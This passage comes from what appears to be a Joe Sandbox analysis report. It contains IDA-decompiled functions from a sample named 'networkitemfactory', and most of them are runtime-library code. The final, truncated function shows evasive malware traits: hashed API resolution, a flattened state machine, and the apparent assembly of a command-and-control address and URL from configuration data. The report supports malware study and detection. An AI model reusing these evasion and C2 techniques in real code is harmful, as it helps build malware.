                                                                                                      0x0040dd2d
                                                                                                      0x0040dd30
                                                                                                      0x0040dd33
                                                                                                      0x0040dd39
                                                                                                      0x0040dd3b
                                                                                                      0x0040dd3d
                                                                                                      0x0040dd3f
                                                                                                      0x0040dd42
                                                                                                      0x0040dd46
                                                                                                      0x0040dd48
                                                                                                      0x0040dd4e
                                                                                                      0x0040dd51
                                                                                                      0x0040dd56
                                                                                                      0x0040dd4e
                                                                                                      0x0040dd46
                                                                                                      0x0040dd57
                                                                                                      0x0040dd5c
                                                                                                      0x0040dd5f
                                                                                                      0x0040dd65
                                                                                                      0x0040dd6b
                                                                                                      0x0040dd6b
                                                                                                      0x0040dd6f
                                                                                                      0x0040dd76
                                                                                                      0x0040dd0b
                                                                                                      0x0040dd0b
                                                                                                      0x0040dd0b
                                                                                                      0x0040dd0e
                                                                                                      0x0040dd10
                                                                                                      0x0040dd14
                                                                                                      0x0040dd19
                                                                                                      0x0040dd21

                                                                                                      APIs
                                                                                                        • Part of subcall function 00404224: __getptd_noexit.LIBCMT ref: 00404225
                                                                                                        • Part of subcall function 00404224: __amsg_exit.LIBCMT ref: 00404232
                                                                                                      • __amsg_exit.LIBCMT ref: 0040DD14
                                                                                                      • __lock.LIBCMT ref: 0040DD24
                                                                                                      • _free.LIBCMT ref: 0040DD51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __amsg_exit$__getptd_noexit__lock_free
                                                                                                      • String ID: pUC$lS
                                                                                                      • API String ID: 3054295789-4220208505
                                                                                                      • Opcode ID: 4c84405c307965613a111f208fc7c825eb10043995980390d3693b8e5dccc630
                                                                                                      • Instruction ID: f7bd0d1cb375b59fdf65ca27020606fa41fe1823a4a118f136f2b5f5d8d1c8b0
                                                                                                      • Opcode Fuzzy Hash: 4c84405c307965613a111f208fc7c825eb10043995980390d3693b8e5dccc630
                                                                                                      • Instruction Fuzzy Hash: D8118E32D01A21ABDB21AFA9A40125AB7A0BF04B20F15413FF854B72D0C7386946CFCD
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 23%
                                                                                                      			E004047D4(void* __ebx, void* __esi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                      				void* __edi;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t25;
                                                                                                      				void* _t28;
                                                                                                      				intOrPtr _t29;
                                                                                                      				void* _t30;
                                                                                                      				intOrPtr* _t31;
                                                                                                      				void* _t33;
                                                                                                      
                                                                                                      				_t30 = __esi;
                                                                                                      				_t27 = __ebx;
                                                                                                      				_t35 = _a28;
                                                                                                      				_t29 = _a8;
                                                                                                      				if(_a28 != 0) {
                                                                                                      					_push(_a28);
                                                                                                      					_push(_a24);
                                                                                                      					_push(_t29);
                                                                                                      					_t5 =  &_a4; // 0x404c38
                                                                                                      					_push( *_t5);
                                                                                                      					E00404EE0(__ebx, _t29, __esi, _t35);
                                                                                                      					_t33 = _t33 + 0x10;
                                                                                                      				}
                                                                                                      				_t36 = _a40;
                                                                                                      				_t7 =  &_a4; // 0x404c38
                                                                                                      				_push( *_t7);
                                                                                                      				if(_a40 != 0) {
                                                                                                      					_push(_a40);
                                                                                                      				} else {
                                                                                                      					_push(_t29);
                                                                                                      				}
                                                                                                      				E00402935(_t28);
                                                                                                      				_push(_t30);
                                                                                                      				_t31 = _a32;
                                                                                                      				_push( *_t31);
                                                                                                      				_push(_a20);
                                                                                                      				_push(_a16);
                                                                                                      				_push(_t29);
                                                                                                      				E0040551F(_t27, _t31, _t36);
                                                                                                      				_push(0x100);
                                                                                                      				_push(_a36);
                                                                                                      				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                                                                                                      				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                                                                      				_push(_a20);
                                                                                                      				_push(_a12);
                                                                                                      				_push(_t29);
                                                                                                      				_push(_a4);
                                                                                                      				_t25 = E004045CE(_t27, _t29, _t31, _t36);
                                                                                                      				if(_t25 != 0) {
                                                                                                      					E00402903(_t25, _t29);
                                                                                                      					return _t25;
                                                                                                      				}
                                                                                                      				return _t25;
                                                                                                      			}











                                                                                                      0x004047d4
                                                                                                      0x004047d4
                                                                                                      0x004047d7
                                                                                                      0x004047dc
                                                                                                      0x004047df
                                                                                                      0x004047e1
                                                                                                      0x004047e4
                                                                                                      0x004047e7
                                                                                                      0x004047e8
                                                                                                      0x004047e8
                                                                                                      0x004047eb
                                                                                                      0x004047f0
                                                                                                      0x004047f0
                                                                                                      0x004047f3
                                                                                                      0x004047f7
                                                                                                      0x004047f7
                                                                                                      0x004047fa
                                                                                                      0x004047ff
                                                                                                      0x004047fc
                                                                                                      0x004047fc
                                                                                                      0x004047fc
                                                                                                      0x00404802
                                                                                                      0x00404807
                                                                                                      0x00404808
                                                                                                      0x0040480b
                                                                                                      0x0040480d
                                                                                                      0x00404810
                                                                                                      0x00404813
                                                                                                      0x00404814
                                                                                                      0x0040481d
                                                                                                      0x00404822
                                                                                                      0x00404825
                                                                                                      0x0040482b
                                                                                                      0x0040482e
                                                                                                      0x00404831
                                                                                                      0x00404834
                                                                                                      0x00404835
                                                                                                      0x00404838
                                                                                                      0x00404843
                                                                                                      0x00404847
                                                                                                      0x00000000
                                                                                                      0x00404847
                                                                                                      0x0040484e

                                                                                                      APIs
                                                                                                      • ___BuildCatchObject.LIBCMT ref: 004047EB
                                                                                                        • Part of subcall function 00404EE0: ___AdjustPointer.LIBCMT ref: 00404F29
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00404802
                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 00404814
                                                                                                      • CallCatchBlock.LIBCMT ref: 00404838
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                      • String ID: 8L@
                                                                                                      • API String ID: 2633735394-4280888483
                                                                                                      • Opcode ID: de3a390995e930c270733da9eb8ff1fb1c933b5d220bcc45bc1d3bfe70562cc1
                                                                                                      • Instruction ID: 7addfb298fc54b3c6c01c9a40d77cef2251b0c5da60657127e47733218de6bb0
                                                                                                      • Opcode Fuzzy Hash: de3a390995e930c270733da9eb8ff1fb1c933b5d220bcc45bc1d3bfe70562cc1
                                                                                                      • Instruction Fuzzy Hash: 28012D72000109BBCF126F55DC05EDB3BBAFF89754F15802AFA1872161C779E861EBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00401B00(struct HINSTANCE__* _a4) {
                                                                                                      				struct _WNDCLASSEXA _v52;
                                                                                                      				struct HINSTANCE__* _t16;
                                                                                                      
                                                                                                      				_t16 = _a4;
                                                                                                      				_v52.cbSize = 0x30;
                                                                                                      				_v52.style = 3;
                                                                                                      				_v52.lpfnWndProc = 0x401046;
                                                                                                      				_v52.cbClsExtra = 0;
                                                                                                      				_v52.cbWndExtra = 0;
                                                                                                      				_v52.hInstance = _t16;
                                                                                                      				_v52.hIcon = LoadIconA(_t16, 0x6b);
                                                                                                      				_v52.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                      				_v52.hbrBackground = 6;
                                                                                                      				_v52.lpszMenuName = 0;
                                                                                                      				_v52.lpszClassName = 0x4368b0;
                                                                                                      				_v52.hIconSm = LoadIconA(_v52.hInstance, 0x6c);
                                                                                                      				return RegisterClassExA( &_v52);
                                                                                                      			}





                                                                                                      0x00401b06
                                                                                                      0x00401b0c
                                                                                                      0x00401b13
                                                                                                      0x00401b1a
                                                                                                      0x00401b21
                                                                                                      0x00401b28
                                                                                                      0x00401b2f
                                                                                                      0x00401b3f
                                                                                                      0x00401b4d
                                                                                                      0x00401b50
                                                                                                      0x00401b57
                                                                                                      0x00401b5e
                                                                                                      0x00401b6b
                                                                                                      0x00401b7b

                                                                                                      APIs
                                                                                                      • LoadIconA.USER32(?,0000006B), ref: 00401B32
                                                                                                      • LoadCursorA.USER32 ref: 00401B42
                                                                                                      • LoadIconA.USER32(?,0000006C), ref: 00401B65
                                                                                                      • RegisterClassExA.USER32(00000030), ref: 00401B72
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Icon$ClassCursorRegister
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 4202395251-4108050209
                                                                                                      • Opcode ID: a71c3b1cb4ff5c24059766a0e8a90010ee43dc88a63ad91dff96757c0ac73305
                                                                                                      • Instruction ID: ac0e75dba2af3176d702dc32e44df3b044374c7e21e17c4da143abcc9c03fe3b
                                                                                                      • Opcode Fuzzy Hash: a71c3b1cb4ff5c24059766a0e8a90010ee43dc88a63ad91dff96757c0ac73305
                                                                                                      • Instruction Fuzzy Hash: 3101BBB0C40209ABEF009FE0D95D79EBFB8BB08304F108559E515BA290D7BA46148F98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 95%
                                                                                                      			E0040F8E6(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                                                                      				void* _t7;
                                                                                                      				void* _t8;
                                                                                                      				intOrPtr* _t9;
                                                                                                      				intOrPtr* _t12;
                                                                                                      				void* _t20;
                                                                                                      				long _t31;
                                                                                                      
                                                                                                      				if(_a4 != 0) {
                                                                                                      					_t31 = _a8;
                                                                                                      					if(_t31 != 0) {
                                                                                                      						_push(__ebx);
                                                                                                      						while(_t31 <= 0xffffffe0) {
                                                                                                      							if(_t31 == 0) {
                                                                                                      								_t31 = _t31 + 1;
                                                                                                      							}
                                                                                                      							_t7 = HeapReAlloc( *0x43735c, 0, _a4, _t31);
                                                                                                      							_t20 = _t7;
                                                                                                      							if(_t20 != 0) {
                                                                                                      								L17:
                                                                                                      								_t8 = _t20;
                                                                                                      							} else {
                                                                                                      								if( *0x437358 == _t7) {
                                                                                                      									_t9 = E00403FAC();
                                                                                                      									 *_t9 = E00404005(GetLastError());
                                                                                                      									goto L17;
                                                                                                      								} else {
                                                                                                      									if(E004036E7(_t7, _t31) == 0) {
                                                                                                      										_t12 = E00403FAC();
                                                                                                      										 *_t12 = E00404005(GetLastError());
                                                                                                      										L12:
                                                                                                      										_t8 = 0;
                                                                                                      									} else {
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							goto L14;
                                                                                                      						}
                                                                                                      						E004036E7(_t6, _t31);
                                                                                                      						 *((intOrPtr*)(E00403FAC())) = 0xc;
                                                                                                      						goto L12;
                                                                                                      					} else {
                                                                                                      						E00402CB3(_a4);
                                                                                                      						_t8 = 0;
                                                                                                      					}
                                                                                                      					L14:
                                                                                                      					return _t8;
                                                                                                      				} else {
                                                                                                      					return E004025D7(__ebx, __edx, __edi, _a8);
                                                                                                      				}
                                                                                                      			}









                                                                                                      0x0040f8ed
                                                                                                      0x0040f8fb
                                                                                                      0x0040f900
                                                                                                      0x0040f90f
                                                                                                      0x0040f942
                                                                                                      0x0040f914
                                                                                                      0x0040f916
                                                                                                      0x0040f916
                                                                                                      0x0040f923
                                                                                                      0x0040f929
                                                                                                      0x0040f92d
                                                                                                      0x0040f98d
                                                                                                      0x0040f98d
                                                                                                      0x0040f92f
                                                                                                      0x0040f935
                                                                                                      0x0040f977
                                                                                                      0x0040f98b
                                                                                                      0x00000000
                                                                                                      0x0040f937
                                                                                                      0x0040f940
                                                                                                      0x0040f95f
                                                                                                      0x0040f973
                                                                                                      0x0040f959
                                                                                                      0x0040f959
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040f940
                                                                                                      0x0040f935
                                                                                                      0x00000000
                                                                                                      0x0040f95b
                                                                                                      0x0040f948
                                                                                                      0x0040f953
                                                                                                      0x00000000
                                                                                                      0x0040f902
                                                                                                      0x0040f905
                                                                                                      0x0040f90b
                                                                                                      0x0040f90b
                                                                                                      0x0040f95c
                                                                                                      0x0040f95e
                                                                                                      0x0040f8ef
                                                                                                      0x0040f8f9
                                                                                                      0x0040f8f9

                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 0040F8F2
                                                                                                        • Part of subcall function 004025D7: __FF_MSGBANNER.LIBCMT ref: 004025EE
                                                                                                        • Part of subcall function 004025D7: __NMSG_WRITE.LIBCMT ref: 004025F5
                                                                                                        • Part of subcall function 004025D7: RtlAllocateHeap.NTDLL(00520000,00000000,00000001,00000000,00000000,00000000,?,0040D04F,00000000,00000000,00000000,00000000,?,00406E45,00000018,00434500), ref: 0040261A
                                                                                                      • _free.LIBCMT ref: 0040F905
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1020059152-0
                                                                                                      • Opcode ID: 7a0ca71ea7ed07806f718cd88403afa96b90f780b46ebdba71b186e10baf8954
                                                                                                      • Instruction ID: 7eca6f38aeb7a3005b5944069fb91ed30c7bffdeea9973184b42a437568cbb77
                                                                                                      • Opcode Fuzzy Hash: 7a0ca71ea7ed07806f718cd88403afa96b90f780b46ebdba71b186e10baf8954
                                                                                                      • Instruction Fuzzy Hash: E011E7B2804612BBCF313F71AC0475A3BA8AF44368F20443BF945B66D1DB3D8D44969C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 78%
                                                                                                      			E020B12B0(char __ecx, signed int __edx, intOrPtr* _a4) {
                                                                                                      				char _v2048;
                                                                                                      				char _v2560;
                                                                                                      				char _v2688;
                                                                                                      				char _v2816;
                                                                                                      				intOrPtr _v2820;
                                                                                                      				intOrPtr _v2824;
                                                                                                      				char _v2828;
                                                                                                      				char _v2836;
                                                                                                      				char _v2844;
                                                                                                      				intOrPtr _v2848;
                                                                                                      				char _v2852;
                                                                                                      				intOrPtr _v2856;
                                                                                                      				char _v2860;
                                                                                                      				intOrPtr _v2864;
                                                                                                      				char _v2868;
                                                                                                      				intOrPtr* _v2872;
                                                                                                      				signed int _v2876;
                                                                                                      				signed int _v2880;
                                                                                                      				char _v2884;
                                                                                                      				signed int _v2888;
                                                                                                      				signed int _v2892;
                                                                                                      				intOrPtr* _v2896;
                                                                                                      				intOrPtr _v2900;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t107;
                                                                                                      				signed int _t108;
                                                                                                      				intOrPtr* _t113;
                                                                                                      				signed int _t119;
                                                                                                      				signed int _t123;
                                                                                                      				intOrPtr* _t126;
                                                                                                      				intOrPtr* _t128;
                                                                                                      				signed int _t137;
                                                                                                      				void* _t141;
                                                                                                      				intOrPtr _t147;
                                                                                                      				intOrPtr _t148;
                                                                                                      				intOrPtr* _t159;
                                                                                                      				void* _t165;
                                                                                                      				signed int _t167;
                                                                                                      				intOrPtr* _t177;
                                                                                                      				void* _t180;
                                                                                                      				intOrPtr _t196;
                                                                                                      				intOrPtr* _t206;
                                                                                                      				intOrPtr _t229;
                                                                                                      				signed char* _t245;
                                                                                                      				signed int _t260;
                                                                                                      				short* _t261;
                                                                                                      				void* _t263;
                                                                                                      				short* _t264;
                                                                                                      				void* _t266;
                                                                                                      				void* _t268;
                                                                                                      				void* _t270;
                                                                                                      				intOrPtr* _t272;
                                                                                                      				signed int _t276;
                                                                                                      				char _t277;
                                                                                                      				intOrPtr* _t278;
                                                                                                      				intOrPtr* _t279;
                                                                                                      				void* _t281;
                                                                                                      				void* _t283;
                                                                                                      				void* _t284;
                                                                                                      				void* _t285;
                                                                                                      
                                                                                                      				_t281 =  &_v2896;
                                                                                                      				_t279 = _v2860;
                                                                                                      				_v2888 = 0;
                                                                                                      				_t260 = __edx;
                                                                                                      				_v2880 = __edx;
                                                                                                      				_t107 = 0x34b824cd;
                                                                                                      				_v2884 = __ecx;
                                                                                                      				_v2896 = _v2856;
                                                                                                      				_v2872 = _t279;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					_t177 = _a4;
                                                                                                      					while(1) {
                                                                                                      						_t241 = _v2892;
                                                                                                      						do {
                                                                                                      							while(1) {
                                                                                                      								L3:
                                                                                                      								_t283 = _t107 - 0x1eb6b95d;
                                                                                                      								if(_t283 > 0) {
                                                                                                      									break;
                                                                                                      								}
                                                                                                      								if(_t283 == 0) {
                                                                                                      									_t126 =  *0x20bddc8;
                                                                                                      									__eflags = _t126;
                                                                                                      									if(_t126 == 0) {
                                                                                                      										_t126 = E020B3DD0(_t177, E020B3E70(0xbb51e2dc), 0x298e8809, _t279);
                                                                                                      										 *0x20bddc8 = _t126;
                                                                                                      									}
                                                                                                      									_t266 =  *_t126();
                                                                                                      									_t128 =  *0x20bdbec;
                                                                                                      									__eflags = _t128;
                                                                                                      									if(_t128 == 0) {
                                                                                                      										_t128 = E020B3DD0(_t177, E020B3E70(0xbb51e2dc), 0x632f374, _t279);
                                                                                                      										 *0x20bdbec = _t128;
                                                                                                      									}
                                                                                                      									 *_t128(_t266, 0, _t279);
                                                                                                      									goto L68;
                                                                                                      								} else {
                                                                                                      									_t284 = _t107 - 0xe09be1f;
                                                                                                      									if(_t284 > 0) {
                                                                                                      										__eflags = _t107 - 0x1994374c;
                                                                                                      										if(__eflags > 0) {
                                                                                                      											__eflags = _t107 - 0x1e99af87;
                                                                                                      											if(_t107 != 0x1e99af87) {
                                                                                                      												goto L58;
                                                                                                      											} else {
                                                                                                      												_v2868 = 0;
                                                                                                      												_v2864 = 0;
                                                                                                      												_t137 = E020B2BA0( &_v2688, _t241,  &_v2560,  &_v2048,  &_v2844,  &_v2868);
                                                                                                      												_t281 = _t281 + 0x10;
                                                                                                      												asm("sbb eax, eax");
                                                                                                      												_t107 = ( ~_t137 & 0x11817f15) + 0x1fd2b00b;
                                                                                                      												while(1) {
                                                                                                      													_t241 = _v2892;
                                                                                                      													goto L3;
                                                                                                      												}
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											if(__eflags == 0) {
                                                                                                      												E020B4180(_t177, _v2836);
                                                                                                      												_t107 = 0x33f162b3;
                                                                                                      												while(1) {
                                                                                                      													_t241 = _v2892;
                                                                                                      													goto L3;
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												__eflags = _t107 - 0x11137988;
                                                                                                      												if(_t107 == 0x11137988) {
                                                                                                      													_t141 = E020B3460(0x20bd090);
                                                                                                      													_t278 =  *0x20bdf10;
                                                                                                      													_t263 = _t141;
                                                                                                      													__eflags = _t278;
                                                                                                      													if(_t278 == 0) {
                                                                                                      														_t278 = E020B3DD0(_t177, E020B3E70(0xe60124ba), 0xec538b3a, _t279);
                                                                                                      														 *0x20bdf10 = _t278;
                                                                                                      													}
                                                                                                      													_t196 =  *0x20be35c; // 0x550bb8
                                                                                                      													_t245 =  *(_t196 + 0x2c);
                                                                                                      													 *_t278( &_v2688, 0x40, _t263, _t245[3] & 0x000000ff, _t245[2] & 0x000000ff, _t245[1] & 0x000000ff,  *_t245 & 0x000000ff);
                                                                                                      													_t281 = _t281 + 0x1c;
                                                                                                      													E020B3400(_t263);
                                                                                                      													_t147 =  *0x20be35c; // 0x550bb8
                                                                                                      													_t260 = _v2880;
                                                                                                      													_t277 = _v2884;
                                                                                                      													_t148 =  *((intOrPtr*)(_t147 + 0x2c));
                                                                                                      													_t241 =  *(_t148 + 4) & 0x0000ffff;
                                                                                                      													_t107 = 0x5ac3e84;
                                                                                                      													_v2892 =  *(_t148 + 4) & 0x0000ffff;
                                                                                                      													continue;
                                                                                                      												} else {
                                                                                                      													__eflags = _t107 - 0x14d5ed4a;
                                                                                                      													if(_t107 != 0x14d5ed4a) {
                                                                                                      														goto L58;
                                                                                                      													} else {
                                                                                                      														E020B4180(_t177, _v2868);
                                                                                                      														_t107 = 0x1fd2b00b;
                                                                                                      														while(1) {
                                                                                                      															_t241 = _v2892;
                                                                                                      															goto L3;
                                                                                                      														}
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(_t284 == 0) {
                                                                                                      											_t268 =  *(_t260 + 4) + (0x51eb851f *  *(_t260 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t260 + 4) >> 0x20 >> 5);
                                                                                                      											_t279 = E020B4220(_t177, _t268);
                                                                                                      											_v2872 = _t279;
                                                                                                      											__eflags = _t279;
                                                                                                      											if(_t279 == 0) {
                                                                                                      												L68:
                                                                                                      												return _v2900;
                                                                                                      											} else {
                                                                                                      												_push(_t268);
                                                                                                      												_push(_t279);
                                                                                                      												_t206 = E020B5B30( *_t260,  *(_t260 + 4), _t279);
                                                                                                      												_t281 = _t281 + 8;
                                                                                                      												_v2896 = _t206;
                                                                                                      												__eflags = _t206;
                                                                                                      												if(_t206 == 0) {
                                                                                                      													E020B4180(_t177, _t279);
                                                                                                      													return _v2888;
                                                                                                      												} else {
                                                                                                      													_t107 = 0x202b0a47;
                                                                                                      													while(1) {
                                                                                                      														_t241 = _v2892;
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											_t285 = _t107 - 0xa20cd0f;
                                                                                                      											if(_t285 > 0) {
                                                                                                      												__eflags = _t107 - 0xb290b63;
                                                                                                      												if(_t107 != 0xb290b63) {
                                                                                                      													goto L58;
                                                                                                      												} else {
                                                                                                      													_t270 = E020B3460(0x20bd100);
                                                                                                      													_t159 =  *0x20bdf10;
                                                                                                      													__eflags = _t159;
                                                                                                      													if(_t159 == 0) {
                                                                                                      														_t159 = E020B3DD0(_t177, E020B3E70(0xe60124ba), 0xec538b3a, _t279);
                                                                                                      														 *0x20bdf10 = _t159;
                                                                                                      													}
                                                                                                      													 *_t159( &_v2048, 0x400, _t270,  &_v2688,  &_v2560,  &_v2816);
                                                                                                      													_t281 = _t281 + 0x18;
                                                                                                      													E020B3400(_t270);
                                                                                                      													_t107 = 0x20a98e65;
                                                                                                      													while(1) {
                                                                                                      														_t241 = _v2892;
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												if(_t285 == 0) {
                                                                                                      													 *((intOrPtr*)(_t177 + 4)) =  *_v2852;
                                                                                                      													_t272 = E020B4220(_t177,  *_v2852);
                                                                                                      													 *_t177 = _t272;
                                                                                                      													__eflags = _t272;
                                                                                                      													if(_t272 != 0) {
                                                                                                      														_push( *((intOrPtr*)(_t177 + 4)));
                                                                                                      														_push(_t272);
                                                                                                      														_t165 = E020B5750(_v2848 - 4);
                                                                                                      														_t281 = _t281 + 8;
                                                                                                      														__eflags = 0 - _t165;
                                                                                                      														asm("sbb edi, edi");
                                                                                                      														_v2888 =  ~_t260;
                                                                                                      														if(0 == _t165) {
                                                                                                      															E020B4180(_t177,  *_t177);
                                                                                                      														}
                                                                                                      														_t260 = _v2880;
                                                                                                      													}
                                                                                                      													_t107 = 0x2833dc8d;
                                                                                                      													while(1) {
                                                                                                      														_t241 = _v2892;
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												} else {
                                                                                                      													if(_t107 == 0x32df52c) {
                                                                                                      														_t167 = E020B2240( &_v2860,  &_v2836);
                                                                                                      														asm("sbb eax, eax");
                                                                                                      														_t107 = ( ~_t167 & 0xdd2216d5) + 0x33f162b3;
                                                                                                      														while(1) {
                                                                                                      															_t241 = _v2892;
                                                                                                      															goto L3;
                                                                                                      														}
                                                                                                      													} else {
                                                                                                      														if(_t107 != 0x5ac3e84) {
                                                                                                      															goto L58;
                                                                                                      														} else {
                                                                                                      															_t261 =  &_v2560;
                                                                                                      															_t180 = _v2876 - (0xaaaaaaab * _v2876 >> 0x20 >> 2) + (0xaaaaaaab * _v2876 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2876 >> 0x20 >> 2) + (0xaaaaaaab * _v2876 >> 0x20 >> 2) * 2 + 1;
                                                                                                      															if(_t180 != 0) {
                                                                                                      																do {
                                                                                                      																	_t276 = (_v2876 & 0x0000000f) + 4;
                                                                                                      																	E020B4E10(_t261, _t276,  &_v2876);
                                                                                                      																	_t264 = _t261 + _t276 * 2;
                                                                                                      																	_t281 = _t281 + 4;
                                                                                                      																	 *_t264 = 0x2f;
                                                                                                      																	_t261 = _t264 + 2;
                                                                                                      																	_t180 = _t180 - 1;
                                                                                                      																} while (_t180 != 0);
                                                                                                      																_t279 = _v2872;
                                                                                                      																_t277 = _v2884;
                                                                                                      															}
                                                                                                      															 *_t261 = 0;
                                                                                                      															_t107 = 0x3114903d;
                                                                                                      															_t260 = _v2880;
                                                                                                      															goto L1;
                                                                                                      														}
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      								L69:
                                                                                                      							}
                                                                                                      							__eflags = _t107 - 0x3114903d;
                                                                                                      							if(__eflags > 0) {
                                                                                                      								__eflags = _t107 - 0x31542f20;
                                                                                                      								if(_t107 == 0x31542f20) {
                                                                                                      									_t108 = E020B1F60( &_v2868,  &_v2852);
                                                                                                      									asm("sbb eax, eax");
                                                                                                      									_t107 = ( ~_t108 & 0xf54adfc5) + 0x14d5ed4a;
                                                                                                      									_t241 = _v2892;
                                                                                                      									goto L3;
                                                                                                      								} else {
                                                                                                      									__eflags = _t107 - 0x33f162b3;
                                                                                                      									if(_t107 == 0x33f162b3) {
                                                                                                      										E020B4180(_t177, _v2860);
                                                                                                      										_t107 = 0x1eb6b95d;
                                                                                                      										while(1) {
                                                                                                      											_t241 = _v2892;
                                                                                                      											goto L3;
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										__eflags = _t107 - 0x34b824cd;
                                                                                                      										if(_t107 != 0x34b824cd) {
                                                                                                      											goto L58;
                                                                                                      										} else {
                                                                                                      											_t113 =  *0x20bdc10;
                                                                                                      											__eflags = _t113;
                                                                                                      											if(_t113 == 0) {
                                                                                                      												_t113 = E020B3DD0(_t177, E020B3E70(0xbb51e2dc), 0x8ecd1a70, _t279);
                                                                                                      												 *0x20bdc10 = _t113;
                                                                                                      											}
                                                                                                      											_v2876 =  *_t113();
                                                                                                      											_t107 = 0xe09be1f;
                                                                                                      											while(1) {
                                                                                                      												_t241 = _v2892;
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(__eflags == 0) {
                                                                                                      									E020B1C10( &_v2816);
                                                                                                      									_t107 = 0xb290b63;
                                                                                                      									while(1) {
                                                                                                      										_t241 = _v2892;
                                                                                                      										goto L3;
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									__eflags = _t107 - 0x20a98e65;
